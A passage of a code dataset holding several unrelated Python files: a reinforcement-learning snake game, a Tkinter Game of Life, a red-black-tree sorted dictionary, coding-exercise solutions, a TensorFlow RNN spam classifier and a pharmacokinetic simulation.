zip(self.brain.saved_log_probs, rewards):\n policy_loss.append(-log_prob * reward)\n self.optimizer.zero_grad()\n policy_loss = torch.cat(policy_loss).sum()\n print(\" pol: {} \\n\".format(policy_loss))\n policy_loss.backward()\n self.optimizer.step()\n del self.brain.rewards[:]\n del self.brain.saved_log_probs[:]\n\n def set_direction(self):\n action = self.select_action()\n cur_dir = None\n if action[0] == 1 and action[1] == 0:\n next_dir = \"LEFT\"\n elif action[0] == 0 and action[1] == 1:\n next_dir = \"RIGHT\"\n else:\n next_dir = None\n for i in self.direction_map:\n if self.direction_map[i] == self.direction:\n cur_dir = i\n break\n if next_dir == \"LEFT\":\n cur_dir -= 1\n elif next_dir == \"RIGHT\":\n cur_dir += 1\n else:\n cur_dir = cur_dir\n\n if cur_dir < 1:\n cur_dir = 4\n elif cur_dir > 4:\n cur_dir = 1\n\n self.direction = self.direction_map[cur_dir]\n # if new_direction == 'RIGHT' and not self.direction == 'LEFT':\n # self.direction = new_direction\n # if new_direction == 'LEFT' and not self.direction == 'RIGHT':\n # self.direction = new_direction\n # if new_direction == 'UP' and not self.direction == 'DOWN':\n # self.direction = new_direction\n # if new_direction == 'DOWN' and not self.direction == 'UP':\n # self.direction = new_direction\n\n def move(self):\n self.generate_brain_input()\n self.set_direction()\n if self.direction == \"RIGHT\":\n self.head[0] += 10\n if self.direction == \"LEFT\":\n self.head[0] -= 10\n if self.direction == \"DOWN\":\n self.head[1] += 10\n if self.direction == \"UP\":\n self.head[1] -= 10\n self.steps += 1\n self.time_to_live -= 1\n self.body.insert(0, list(self.head))\n self.check_collision()\n self.give_reward()\n self.update_fitness()\n if self.steps % 5 == 0:\n self.finish_episode()\n if self.head == self.foodLoc:\n self.score += 1\n self.time_to_live = 10 * len(self.body) + 100\n self.food_on_screen = False\n self.spawn_food()\n return 1\n else:\n self.body.pop()\n return 0\n\n def check_collision(self):\n obst = self.wall_array + self.body[1:]\n if self.head in obst:\n self.terminate()\n return 1\n return 0\n\n def terminate(self):\n self.is_alive = False\n self.finish_episode()\n\n def spawn_food(self):\n if not self.food_on_screen:\n self.foodLoc = [random.randrange(0, self.MaxWidth / 10) * 10, random.randrange(0, self.MaxHeight / 10) * 10]\n self.food_on_screen = True\n\n def locate_food(self):\n if self.head[0] > self.foodLoc[0]:\n self.food_quadrant[0] = 1\n else:\n self.food_quadrant[0] = 0\n\n if self.head[1] > self.foodLoc[1]:\n self.food_quadrant[1] = 0\n else:\n self.food_quadrant[1] = 1\n\n a = self.head[0] - self.foodLoc[0]\n b = self.head[1] - self.foodLoc[1]\n self.dst_to_food = np.sqrt(a ** 2 + b ** 2)\n\n def detect_obstacles(self):\n obstacle_array = self.body[1:] + self.wall_array\n\n north = []\n northeast = []\n east = []\n southeast = []\n south = []\n southwest = []\n west = []\n northwest = []\n\n for item in obstacle_array:\n if self.head[0] == item[0] and self.head[1] - item[1] > 0:\n north.append(self.head[1] - item[1])\n elif self.head[0] == item[0] and item[1] - self.head[1] > 0:\n south.append(item[1] - self.head[1])\n elif self.head[1] == item[1] and item[0] - self.head[0] > 0:\n east.append(item[0] - self.head[0])\n elif self.head[1] == item[1] and self.head[0] - item[0] > 0:\n west.append(self.head[0] - item[0])\n\n elif self.head[1] - item[1] == self.head[0] - item[0] and (self.head[1] - item[1]) * self.sqrt2 > 0:\n northwest.append((self.head[1] - item[1]) * self.sqrt2)\n elif item[1] - self.head[1] 
== self.head[0] - item[0] and (item[1] - self.head[1]) * self.sqrt2 > 0:\n                southwest.append((item[1] - self.head[1]) * self.sqrt2)\n            elif item[1] - self.head[1] == item[0] - self.head[0] and (item[1] - self.head[1]) * self.sqrt2 > 0:\n                southeast.append((item[1] - self.head[1]) * self.sqrt2)\n            elif self.head[1] - item[1] == item[0] - self.head[0] and (self.head[1] - item[1]) * self.sqrt2 > 0:\n                northeast.append((self.head[1] - item[1]) * self.sqrt2)\n\n        obstacle_north = min(north) if len(north) is not 0 else -1\n        obstacle_north_east = min(northeast) if len(northeast) is not 0 else -1\n        obstacle_east = min(east) if len(east) is not 0 else -1\n        obstacle_south_east = min(southeast) if len(southeast) is not 0 else -1\n        obstacle_south = min(south) if len(south) is not 0 else -1\n        obstacle_west = min(west) if len(west) is not 0 else -1\n        obstacle_south_west = min(southwest) if len(southwest) is not 0 else -1\n        obstacle_north_west = min(northwest) if len(northwest) is not 0 else -1\n\n        self.closest_obstacle = [self.scale / obstacle_north, self.scale / obstacle_north_east, self.scale / obstacle_east,\n                                 self.scale / obstacle_south_east,\n                                 self.scale / obstacle_south,\n                                 self.scale / obstacle_south_west, self.scale / obstacle_west, self.scale / obstacle_north_west]\n\n    def generate_brain_input(self):\n        self.locate_food()\n        self.detect_obstacles()\n        self.brain_input = self.closest_obstacle + self.food_quadrant + [(self.scale / self.dst_to_food)]\n\n    def update_global_fitness(self):\n        pass\n\n    def give_reward(self):\n        prev_dst = self.dst_to_food\n        self.locate_food()\n        progress = prev_dst - self.dst_to_food\n        print(\" prog\",progress)\n        if progress < 0:\n            progress = progress * 2\n        print(\" progress\", progress)\n        reward = progress\n        self.brain.rewards.append(reward)\n\n    def update_fitness(self):\n        self.update_global_fitness()\n","sub_path":"Snake/RLBrainySnake.py","file_name":"RLBrainySnake.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"92019118","text":"#!/usr/bin/env python\n\nfrom Tkinter import *\nimport math\n\nGRID_RANGE = 10\n\ndef xy_to_cell_coord(x, y, zoom):\n    return(math.ceil((x-2) / zoom), math.ceil((y-2) / zoom )) \n\ndef grid_centre(x, y, width, height):\n    return(int(x) + (width / 2), int(y) + (height / 2))\n\ndef grid_range(x, y, width, height, factor, zoom):\n    startx = x - width*factor\n    starty = y - height*factor\n    endx = x + width*factor\n    endy = y + height*factor\n    return (startx - startx%zoom + 1, starty - starty%zoom +1, endx, endy)\n\nclass LifeCanvas:\n    def __init__(self, parent, zoom, width, height):\n        self._zoom = zoom\n        self._width = width\n        self._height = height\n        self._engine = LifeEngine(set())\n\n        self._frame = Frame(parent)\n        self._frame.pack()\n\n        self._scrollregion = [-GRID_RANGE * width, -GRID_RANGE * height,\n                              GRID_RANGE * width, GRID_RANGE * height]\n\n        self._canvas=Canvas(self._frame, scrollregion=self._scrollregion,\n                            width=self._width, height=self._height, bg='white')\n\n        self._vertscroll = Scrollbar(self._frame, orient=VERTICAL,\n                                     command=self.yscrollbar)\n        self._vertscroll.pack(side=RIGHT, fill=Y)\n\n        self._canvas.pack() \n\n        self._horiscroll = Scrollbar(self._frame, orient=HORIZONTAL,\n                                     command=self.xscrollbar)\n        self._horiscroll.pack(fill=X) \n        \n        self._canvas.config(xscrollcommand=self._horiscroll.set,\n                            yscrollcommand=self._vertscroll.set)\n        \n        self._canvas.bind(\"<Button-1>\", self.select_cell)\n\n    def xscrollbar(self, arg1, arg2, arg3):\n        x,y = 
grid_centre(self._canvas.canvasx( 0 ),\n self._canvas.canvasy( 0 ),\n self._width, self._height)\n range_width = ( GRID_RANGE-2 ) * self._width\n\n if self._centrex - range_width < x < self._centrex + range_width:\n pass\n else:\n if int( arg2 ) > 0:\n self._scrollregion[2] += range_width\n else:\n self._scrollregion[0] -= range_width\n\n self._canvas.config( scrollregion=self._scrollregion )\n self.redraw()\n\n self._canvas.xview(arg1, arg2, arg3)\n\n def yscrollbar(self, arg1, arg2, arg3):\n x,y = grid_centre(self._canvas.canvasx( 0 ),\n self._canvas.canvasy( 0 ),\n self._width, self._height)\n\n range_height = ( GRID_RANGE-2 ) * self._height\n\n if self._centrey - range_height < y < self._centrey + range_height:\n pass\n else:\n if int( arg2 ) > 0:\n self._scrollregion[3] += range_height\n else:\n self._scrollregion[1] -= range_height\n\n self._canvas.config(scrollregion=self._scrollregion)\n self.redraw()\n\n self._canvas.yview(arg1, arg2, arg3)\n\n def redraw(self):\n self._canvas.delete(ALL)\n self.draw_grid()\n self.draw_cells(self._engine.get_cells())\n\n def select_cell(self, event):\n coord = xy_to_cell_coord(self._canvas.canvasx(event.x),\n self._canvas.canvasy(event.y), self._zoom)\n colour = 'blue' if self._engine.toggle_cell(coord) else 'white' \n self.draw_single_cell(coord[0], coord[1], colour)\n \n def set_zoom(self, zoom):\n self._zoom = zoom\n\n def run_turn(self):\n self.clear_cells(self._engine.get_cells())\n self.draw_cells(self._engine.run_next_turn())\n\n def draw_grid(self):\n self._centrex, self._centrey = grid_centre(self._canvas.canvasx(0),\n self._canvas.canvasy(0),\n self._width, self._height)\n \n startx, starty, endx, endy = grid_range(self._centrex,\n self._centrey,\n self._width, self._height,\n GRID_RANGE, self._zoom)\n\n for x in range(startx, endx, self._zoom):\n self._canvas.create_line(x,starty, x, endy)\n for y in range(starty, endy, self._zoom):\n self._canvas.create_line(startx, y, endx, y)\n\n def draw_single_cell(self, x, y, fillcolour):\n self._canvas.create_rectangle(( x-1 ) * self._zoom + 2,\n ( y-1 ) * self._zoom + 2,\n x*self._zoom + 1,\n y*self._zoom + 1,\n fill=fillcolour, width=0 )\n\n def draw_cells(self, cells):\n for x, y in cells:\n self.draw_single_cell(x, y, 'blue');\n\n def clear_cells( self, cells ):\n for x, y in cells:\n self.draw_single_cell(x, y, 'white');\n\n\nclass LifeGui:\n def __init__(self, zoom, width, height, timeout):\n self._root = Tk()\n self._zoom = IntVar(self._root)\n self._zoom.set(zoom)\n self._timeout = IntVar(self._root)\n self._timeout.set(timeout)\n self._job = None\n\n self.initialise(width, height)\n\n def initialise(self, width, height):\n self._root.title(\"Lython\")\n\n self._canvas = LifeCanvas(self._root, self._zoom.get(), width, height)\n\n self._gobutton = Button(self._root, text=\"GO\", command=self.gobutton)\n self._gobutton.pack(side=LEFT)\n\n self._stepbutton = Button(self._root, text=\"STEP\",\n command=self.stepbutton)\n self._stepbutton.pack(side=RIGHT)\n \n self._zoomscale = Scale(self._root, variable=self._zoom, label=\"Zoom\",\n command=self.zoomadjust, orient=HORIZONTAL,\n from_=2)\n self._zoomscale.pack(side=LEFT)\n\n self._timescale = Scale(self._root, variable= self._timeout,\n label=\"Time (ms)\", command=self.timescale,\n orient=HORIZONTAL,\n from_=10, to=2000, resolution=10)\n self._timescale.pack(side=RIGHT)\n\n self._canvas.redraw()\n mainloop()\n \n def gobutton(self):\n if (self._gobutton[\"text\"] == \"GO\"):\n self.run_life()\n self._gobutton[\"text\"] = \"STOP\"\n else:\n 
self._root.after_cancel(self._job) \n self._gobutton[\"text\"] = \"GO\"\n\n def stepbutton(self):\n self._canvas.run_turn()\n\n def timescale(self, event):\n if (self._gobutton[\"text\"] == \"GO\" and self._job ):\n self._root.after_cancel(self._job)\n self.run_life()\n\n def zoomadjust(self, event):\n self._canvas.set_zoom(self._zoom.get())\n self._canvas.redraw()\n\n def run_life(self):\n self._canvas.run_turn()\n self._job = self._root.after(self._timeout.get(), self.run_life)\n \n\nclass LifeEngine:\n def __init__(self, live_cells):\n self._live_cells = live_cells\n \n def count_live_cells(self, coordx, coordy):\n return sum(1 for x in range(-1, 2) for y in range(-1, 2)\n if not x == y == 0 and (coordx + x, coordy + y) in self._live_cells)\n\n def comes_alive(self, coordx, coordy):\n live_cells = self.count_live_cells(coordx, coordy)\n if (coordx, coordy) in self._live_cells:\n return live_cells in ( 2, 3 )\n else:\n return live_cells == 3\n\n def run_next_turn(self):\n adjacent = set()\n for node in self._live_cells:\n [adjacent.add( (x + node[0], y + node[1]))\n for x in range(-1, 2) for y in range(-1, 2)]\n alivenext = {i for i in adjacent if self.comes_alive(i[0], i[1])}\n self._live_cells = alivenext\n return self._live_cells\n\n def get_cells(self):\n return self._live_cells\n\n def toggle_cell(self, coord):\n if coord in self._live_cells:\n self._live_cells.remove(coord)\n return False\n else:\n self._live_cells.add(coord)\n return True\n\n# Main\n\ndef main():\n mygui = LifeGui(10, 702, 502, 100)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"python/lython.py","file_name":"lython.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"285725906","text":"\"\"\"\nA Dict and Set implementation which always iterate in order.\n\n`SortedDict` and `SortedSet` are red-black tree-based collections, which store\ntheir keys according to their native Python sort order. This means iteration\n(i.e. 
`for key in dictionary:`, or `for value in set:`) always produces the\nkeys in order.\n\"\"\"\n\nimport collections\n\nfrom crbtree._rbtree import ffi, lib\n\n__all__ = ['SortedDict']\n\n\nItem = collections.namedtuple('Item', ('key', 'value'))\n\n\nclass SortedDict(collections.MutableMapping):\n\n \"A sorted dictionary, backed by a red-black tree.\"\n\n def __init__(self, *args, **kwargs):\n self._rbtree = lib.rb_tree_create(lib.rb_tree_node_compare)\n # This allows us to get the SortedDict Python object from a node\n # removal/dealloc callback.\n self._self_handle = ffi.new_handle(self)\n self._rbtree.info = self._self_handle\n # Track the FFI pointers to Items so they don't get garbage collected.\n self._handles = set()\n for key, value in kwargs.items():\n self[key] = value\n \n if args:\n try:\n if isinstance(args[0], list):\n for item in args[0]:\n self[item[0]] = item[1]\n elif isinstance(args[0], dict):\n for key, value in args[0].items():\n self[key] = value\n else:\n raise ValueError\n except Exception:\n raise TypeError(f'Can\\'t insert type {type(args[0])}')\n \n\n def __del__(self):\n lib.rb_tree_dealloc(self._rbtree, ffi.addressof(\n lib, 'rb_tree_node_dealloc_cb'))\n\n def __len__(self):\n return lib.rb_tree_size(self._rbtree)\n\n def _get(self, key):\n item = Item(key, None) # Create item\n item_p = ffi.new_handle(item) # Get its pointer\n result_p = lib.rb_tree_find(\n self._rbtree, item_p) # Send to command to c\n if result_p == ffi.NULL: # Compare to C NULL\n return (False, None)\n return (True, ffi.from_handle(result_p).value)\n\n def __contains__(self, key):\n return self._get(key)[0]\n\n def __setitem__(self, key, value):\n if key in self:\n del self[key]\n item = Item(key, value)\n item_p = ffi.new_handle(item)\n self._handles.add(item_p)\n if not lib.rb_tree_insert(self._rbtree, item_p):\n raise RuntimeError(\n \"Unexpected error inserting key {!r}\".format(key))\n\n def __getitem__(self, key):\n found, item = self._get(key)\n if found:\n return item\n raise KeyError(key)\n\n def __delitem__(self, key):\n if key not in self:\n raise KeyError(key)\n item = Item(key, None)\n item_p = ffi.new_handle(item)\n removed = lib.rb_tree_remove_with_cb(\n self._rbtree, item_p, lib.rb_tree_node_was_removed)\n if not removed:\n raise RuntimeError(\n \"Unexpected error removing key {!r}\".format(key))\n\n def __iter__(self):\n for key, _ in self._iter():\n yield key\n\n def __eq__(self, other):\n return len(self) == len(other) and sorted_mapping_eq(self, other)\n\n def keys(self):\n for key, _ in self.items():\n yield key\n\n def values(self):\n for _, value in self.items():\n yield value\n\n def _iter(self):\n rb_iter = lib.rb_iter_create()\n try:\n item_p = lib.rb_iter_first(rb_iter, self._rbtree)\n while item_p != ffi.NULL:\n item = ffi.from_handle(item_p)\n yield (item.key, item.value)\n item_p = lib.rb_iter_next(rb_iter)\n finally:\n lib.rb_iter_dealloc(rb_iter)\n\n def items(self):\n return self._iter()\n\n def __repr__(self) -> str:\n st = '{'\n for key, value in self.items():\n st += f\"'{key}': {value}, \"\n st = st.strip(', ') + '}'\n return st\n\n\n@ffi.def_extern()\ndef rb_tree_node_compare(rb_tree_p, rb_node_a, rb_node_b):\n a, b = ffi.from_handle(rb_node_a.value), ffi.from_handle(rb_node_b.value)\n if a.key == b.key:\n return 0\n if a.key < b.key:\n return -1\n return 1\n\n\n@ffi.def_extern()\ndef rb_tree_node_was_removed(rb_tree_p, rb_node_p):\n ffi.from_handle(rb_tree_p.info)._handles.discard(rb_node_p.value)\n lib.rb_tree_node_dealloc_cb(rb_tree_p, 
rb_node_p)\n\n\ndef sorted_mapping_eq(map1, map2):\n return all(\n k1 == k2 and v1 == v2\n for (k1, v1), (k2, v2)\n in zip(map1.items(), map2.items()))\n","sub_path":"crbtree/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"560931481","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the sherlockAndAnagrams function below.\ndef sherlockAndAnagrams(s):\n n = len(s)\n res = 0\n for l in range(1, n):\n cnt = {}\n for i in range(n - l + 1):\n subs = list(s[i:i + l])\n subs.sort()\n subs = ''.join(subs)\n if subs in cnt:\n cnt[subs] += 1\n else:\n cnt[subs] = 1\n res += cnt[subs] - 1\n return res\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n s = input()\n\n result = sherlockAndAnagrams(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"Python3/Sherlock and Anagrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"399207126","text":"# this files contains basic metadata about the project. This data will be used\n# (by default) in the base.html and index.html\n\nPROJECT_METADATA = {\n 'title': 'Reading in the Alps - Metadata',\n 'author': 'Peter Andorfer',\n 'subtitle': 'Private book ownership in the Catholically dominated Central Alps 1750–1800.\\\n A systematic study based on inventories from the Tyrolean Pustertal and Stubaital',\n 'description': 'The project aims at investigating private book ownership in the Catholically\\\n dominated rural areas of the Central Alps, or, putting it more precisely,\\\n in historic Tyrol in the 18th century. This dedicated web application is meant for managing, publishing and anlayzing metadata of the inventories processed in the project.',\n 'github': 'https://github.com/acdh-oeaw/metarita',\n 'purpose_de': 'Ziel ist du Publikation von Forschungsdaten.',\n 'purpose_en': 'The purpose of this website is the publication of research data.',\n 'version': '0.0.1',\n 'matomo_id': '81',\n 'matomo_url': '//piwik.apollo.arz.oeaw.ac.at/'\n}\n","sub_path":"webpage/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"211735415","text":"\"\"\"\nBuild Order\n\nYou are given a list of projects and a list of dependencies (which is a list of pairs of projects, where\nthe second project is dependent on the first project).\n\nAll project's dependencies must be built before the project is. Find a build order that will allow\nthe projects to be built. 
If there is no valid build order return an error.\n\nEx:\n\nInput\n projects: a, b, c, d, e, f\n dependencies: (a, d), (f, b), (b, d), (f, a), (d, c)\n\nOutput\n f, e, a, b, d, c\n\n\"\"\"\n\n\nclass Graph:\n def __init__(self):\n self.nodes = []\n self.mapping = {}\n\n def add_edge(self, start_name, end_name):\n start = self.get_or_create_node(start_name)\n end = self.get_or_create_node(end_name)\n\n start.add_neighbor(end)\n\n def get_or_create_node(self, name):\n if name not in self.mapping:\n node = Project(name)\n self.nodes.append(node)\n self.mapping[name] = node\n return self.mapping[name]\n\n def __str__(self):\n return f\"{self.nodes}\"\n\n\nclass Project:\n def __init__(self, name):\n self.name = name\n self.children = []\n self.mapping = {}\n self.dependencies = 0\n self.state = None\n\n def add_neighbor(self, node):\n if node.name not in self.mapping:\n self.children.append(node)\n self.mapping[node.name] = node\n node.dependencies += 1\n\n def __repr__(self):\n return f\"\"\n\n\ndef solution(projects, dependencies):\n graph = build_graph(projects, dependencies)\n return order_projects(graph.nodes)\n\n\ndef dfs_solution(projects, dependencies):\n graph = build_graph(projects, dependencies)\n return order_projects_dfs(graph.nodes)\n\n\ndef build_graph(projects, dependencies):\n graph = Graph()\n\n for first, second in dependencies:\n graph.add_edge(first, second)\n\n for project in projects:\n graph.get_or_create_node(project)\n\n return graph\n\n\ndef order_projects(projects):\n order = [None] * len(projects)\n\n end_of_list = add_non_dependent(order, projects, 0)\n to_be_processed = 0\n\n while to_be_processed < len(order):\n current = order[to_be_processed]\n\n if current is None:\n return\n\n for child in current.children:\n child.dependencies -= 1\n\n end_of_list = add_non_dependent(order, current.children, end_of_list)\n to_be_processed += 1\n\n return order\n\n\ndef add_non_dependent(order, projects, offset):\n for project in projects:\n if project.dependencies == 0:\n order[offset] = project\n offset += 1\n return offset\n\n\ndef order_projects_dfs(projects):\n stack = []\n\n for project in projects:\n # Project in empty state\n if project.state is None:\n if not dfs(project, stack):\n return\n\n return stack\n\n\ndef dfs(project, stack):\n # Cycle found\n if project.state == \"visiting\":\n return False\n\n if project.state is None:\n project.state = \"visiting\"\n\n for child in project.children:\n if not dfs(child, stack):\n return False\n\n project.state = \"complete\"\n stack.append(project)\n\n return True\n\n\nif __name__ == \"__main__\":\n projects = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n dependencies = [(\"a\", \"d\"), (\"f\", \"b\"), (\"b\", \"d\"), (\"f\", \"a\"), (\"d\", \"c\")]\n\n print(solution(projects, dependencies))\n print(dfs_solution(projects, dependencies))\n","sub_path":"python/trees_graphs/question_4_7.py","file_name":"question_4_7.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"646091668","text":"# coding=utf-8\n\"\"\"Web-based tests for accessability of GET-able web pages.\"\"\"\nfrom ..common.apiphanytestcase import ApiphanyTestCase\n\nclass StatusTests(ApiphanyTestCase):\n def testStatus(self):\n test_client = self.make_test_client()\n rv = test_client.get('/status')\n\n self.assertEqual(rv.status_code, 
200)","sub_path":"test/web/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"510477650","text":"#!/usr/bin/env python\n\n# -*- encoding: utf-8 -*-\n\n'''\n@Author : {lif54334}\n\n@Software: PyCharm\n\n@File : oa_data.py\n\n@Time : 2018/11/23 17:59\n\n@Desc :\n\n'''\nimport numpy as np\n\ndef rank(x):\n y = sorted(x)\n num = list()\n for i in y:\n out = x.index(i) + 1\n print(out)\n num.append(out)\n print(num)\n return num\n\nx = [2, 1, 4, 5, 7, 3, 6]\nresult = rank(x)","sub_path":"machine_learning/ml/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238982525","text":"class Solution1:\n def searchInsert(self, nums, target):\n numsLen = len(nums)\n i = 0\n while i < numsLen:\n if nums[i] == target:\n return i\n elif nums[i] < target:\n i += 1\n else:\n return i\n if i == numsLen:\n return numsLen\n\ns = Solution1()\nnums = [1,3,5,6]\ntargetArr = [5,2,7,0]\nfor i in targetArr:\n print(s.searchInsert(nums,i))","sub_path":"src/session1/q035_search_insert_position/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"252952105","text":"#!/usr/bin/env python\n\nfrom context import fossil_fuel\n\n# Limit the fields that are returned\n# props = ['Name', 'CustomerKey']\n\n# Filter the list of data extenions to retrieve\n# Match DE name precisely\nsearch_filter = {'Property': 'Name',\n 'SimpleOperator': 'like',\n 'Value': 'jpdev'}\n# Find DE's containing a string, use 'like' as the SimpleOperator\n\nprint('Retrieving Emails {}'.format(''))\nresults = fossil_fuel.et_email(action='get', search_filter=search_filter)\nprint(results)\n","sub_path":"example/email_retrieve.py","file_name":"email_retrieve.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"131541089","text":"import numpy as np\nimport tensorflow as tf\nimport random\n\nmax_sequence_length = 25\nmin_word_requency = 0\n# 每个词对应的向量的长度\nembedding_size = 50\n\n\ndef loadData(filePath):\n labels = []\n mail_data = []\n fr = open(filePath)\n lines = fr.readlines()\n for line in lines:\n line = line.strip()\n line = line.split('\\t')\n labels.append(line[0])\n mail_data.append(line[1])\n\n labels = [0 if i== 'ham' else 1 for i in labels ]\n return labels,mail_data\n\n# x = np.load('./data/mail_x.npy')\n# print(x.shape)\n\ndef word2vec(mail_data):\n\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(max_sequence_length,min_word_requency)\n text_processed = np.array(list(vocab_processor.fit_transform(mail_data)))\n vocab_size = len(vocab_processor.vocabulary_)\n\n\n #生成每个词对应的向量\n embedding_mat = tf.Variable(tf.random_normal([vocab_size,50],-1.0,1.0))\n\n #生成每个句子的向量表示\n embedding_output = tf.nn.embedding_lookup(embedding_mat,text_processed)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n word_vec = sess.run(embedding_output)\n return word_vec,vocab_size\n\n\ndef cnn_func(x):\n # 最后一层输出的神经元个数\n output_layer = 1\n\n rnn_size = 256\n #初始化 rnn cell\n cell = tf.nn.rnn_cell.BasicRNNCell(rnn_size)\n\n #循环过程\n outputs, h = tf.nn.dynamic_rnn(cell,x,dtype=tf.float32)\n\n # 取最后一个状态,组建全连接\n W = tf.Variable(tf.truncated_normal([rnn_size, 
output_layer], stddev=0.1))\n b = tf.Variable(tf.constant(0.1, shape=[output_layer]))\n pred = tf.add(tf.matmul(h, W), b)\n return pred\n\n\ndef classifiy_rnn(mail_data,labels):\n\n #超参\n learning_rate = 0.0001\n trainPercent = 0.7\n\n\n trainStep = 2000\n\n mail_vec,vocab_size = word2vec(mail_data)\n labels = np.array(labels).reshape(-1, 1)\n num_sample = mail_vec.shape[0]\n\n index = [i for i in range(mail_vec.shape[0])]\n random.shuffle(index)\n\n trainIndex = index[:round(num_sample * trainPercent)]\n testIndex = index[round(num_sample * trainPercent):]\n\n trainSample = mail_vec[trainIndex,:,:]\n trainLabel = labels[trainIndex]\n testSample = mail_vec[testIndex,:,:]\n testLabel = labels[testIndex]\n\n xPlace = tf.placeholder(shape=[None,max_sequence_length,embedding_size],dtype=tf.float32,name='xPlace')\n labelPlace = tf.placeholder(shape=[None,1],dtype=tf.float32,name='labelPlace')\n\n pred = cnn_func(xPlace)\n\n accur = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.nn.sigmoid(pred)),labelPlace),tf.float32))\n\n\n loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labelPlace,logits=pred)\n\n myopt = tf.train.AdamOptimizer(learning_rate)\n\n trainProcess = myopt.minimize(loss,name='trainProcess')\n\n losses = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for i in range(trainStep):\n sess.run(trainProcess,feed_dict={xPlace:trainSample,labelPlace:trainLabel})\n curAcc = sess.run(accur,feed_dict={xPlace:testSample,labelPlace:testLabel})\n print(curAcc)\n\n\n\n\n\n\nif __name__ == '__main__':\n filePath = './data/mail'\n labels, mail_data = loadData(filePath)\n classifiy_rnn(mail_data,labels)\n","sub_path":"tensorflow/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"64492862","text":"# -*- coding: utf-8 -*-\n\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport sys\nsys.path.append(\"/home/tammo/Dropbox/summer_14/programming\")\nimport matplotlib.pyplot as plt\nimport tammo_lib_new as tl\nfrom numpy import *\nfrom scipy import *\nimport pymc\nimport h5py\nimport cPickle as pickle\n\n\n\nOLD_PATH = '/home/tammo/Dropbox/Master_sync/programming/AIF_project/'\n\n\n# Load popave AIF from Jen\npopave_aif, popave_time = tl.popave_aif()\n\n# Load analytic approximation\nparms = np.load(OLD_PATH + 'AIF_model_parms_popave.npy')\nmodel_time = np.arange(0,360,1)\nmodel_aif = tl.create_model_AIF(parms, model_time)\n\n# Load parker AIF\nparker_aif = tl.parker_aif(time = popave_time/100) \n\n\n# calculate ctr curve\np1 = .3\np2 = .3\np3 = .3\ntrue_parms = [p1, p2, p3]\n\nctr_2CUM = tl.PKmodel([p1,p2,p3], model_time, model_aif, model='2CUM')\n\nctr_PFUM = tl.PKmodel([p1,p2,p3], model_time, model_aif, model='PFUM')\n\n\n#pylab.plot(model_time, ctr_measured, 'k-')\npylab.plot(model_time, ctr_2CUM, 'r--')\npylab.plot(model_time, ctr_PFUM, 'b--')\nplt.show()\n\nM = 100 # iterations\n\nN = 10 # number of ctr curves\n\nmean_percentage_error_weighted = zeros(N)\nmean_percentage_error_2CUM = zeros(N)\nmean_percentage_error_PFUM = zeros(N)\n\nfor j in xrange(M):\n print(j)\n \n percentage_error_weigthed = zeros(N)\n percentage_error_PFUM = zeros(N)\n percentage_error_2CUM = zeros(N)\n \n for i in xrange(N):\n \n # Calculated mixed signal\n weight_step = 1/N\n A = i*weight_step\n B = 1-A\n ctr = (B * ctr_2CUM + A * ctr_PFUM )\n \n # add white noise\n SNR = 20\n noise_std = ctr.mean() / SNR\n ctr_measured = ctr + 
